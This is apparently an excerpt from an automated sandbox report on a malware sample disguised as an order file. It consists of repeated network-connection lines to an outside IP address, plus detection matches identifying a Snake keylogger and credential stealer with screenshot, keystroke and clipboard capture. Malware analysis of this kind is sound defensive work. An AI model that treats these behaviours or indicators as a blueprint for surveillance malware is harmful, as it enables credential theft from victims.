                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50187
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50189
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50192
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50198
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
                Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
                Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
                Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
                Source: unknownNetwork traffic detected: HTTP traffic on port 50221 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
                Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50253 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
                Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
                Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
                Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50242 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
                Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
                Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
                Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50215
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50218
                Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50212
                Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50227
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50221
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50224
                Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50239
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50230
                Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50233
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50236
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
                Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50198 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
                Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50242
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50244
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50247
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50250
                Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50218 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50206 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50250 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50212 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50256 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50206
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50209
                Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50201
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50203
                Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50239 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49935 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50035 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50046 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50053 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50064 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50075 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50086 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50088 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50090 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50092 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50094 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50096 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50098 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50100 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50102 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50104 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50106 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50108 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50110 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50112 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50114 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50116 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50118 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50120 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50122 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50124 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50126 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50128 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50130 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50132 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50134 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50136 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50138 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50140 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50142 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50144 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50146 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50148 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50150 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50152 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50154 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50157 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50160 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50163 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50166 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50169 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50172 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50175 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50178 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50181 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50184 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50189 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50192 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50195 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50198 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50201 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50203 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50206 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50209 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50212 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50215 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50218 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50221 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50224 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50227 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50230 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50233 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50236 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50239 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50244 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50247 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50250 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50253 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50256 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50259 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: 0.2.JB#40044 Order.exe.386e170.2.raw.unpack, UltraSpeed.cs.Net Code: TakeScreenshot
                Source: 0.2.JB#40044 Order.exe.3855f50.1.raw.unpack, UltraSpeed.cs.Net Code: TakeScreenshot
                Source: 0.2.JB#40044 Order.exe.383dd28.0.raw.unpack, UltraSpeed.cs.Net Code: TakeScreenshot
                Source: 0.2.JB#40044 Order.exe.386e170.2.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                Source: 0.2.JB#40044 Order.exe.3855f50.1.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                Source: 0.2.JB#40044 Order.exe.383dd28.0.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                System Summary

                barindex
                Source: 0.2.JB#40044 Order.exe.383dd28.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.JB#40044 Order.exe.383dd28.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.JB#40044 Order.exe.3855f50.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.JB#40044 Order.exe.3855f50.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.JB#40044 Order.exe.386e170.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.JB#40044 Order.exe.386e170.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.JB#40044 Order.exe.386e170.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.JB#40044 Order.exe.386e170.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.JB#40044 Order.exe.3855f50.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.JB#40044 Order.exe.3855f50.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.JB#40044 Order.exe.383dd28.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.JB#40044 Order.exe.383dd28.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1642087584.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: JB#40044 Order.exe PID: 7564, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegAsm.exe PID: 7588, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: JB#40044 Order.exe, stubb.csLong String: Length: 131768
                Source: initial sampleStatic PE information: Filename: JB#40044 Order.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_017BC1681_2_017BC168
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_017BCA581_2_017BCA58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_017B2DD11_2_017B2DD1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_017B4F081_2_017B4F08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_017B7E681_2_017B7E68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_017BB9E01_2_017BB9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_017B7E631_2_017B7E63
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_017B4EF81_2_017B4EF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_072497311_2_07249731
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_072497401_2_07249740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_072455E81_2_072455E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_072462601_2_07246260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_072462591_2_07246259
                Source: JB#40044 Order.exe, 00000000.00000002.1642058807.00000000027E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs JB#40044 Order.exe
                Source: JB#40044 Order.exe, 00000000.00000000.1639123829.0000000000496000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCTTUUEH.exe2 vs JB#40044 Order.exe
                Source: JB#40044 Order.exe, 00000000.00000002.1642087584.00000000037E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs JB#40044 Order.exe
                Source: JB#40044 Order.exe, 00000000.00000002.1641454133.000000000094E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs JB#40044 Order.exe
                Source: JB#40044 Order.exeBinary or memory string: OriginalFilenameCTTUUEH.exe2 vs JB#40044 Order.exe
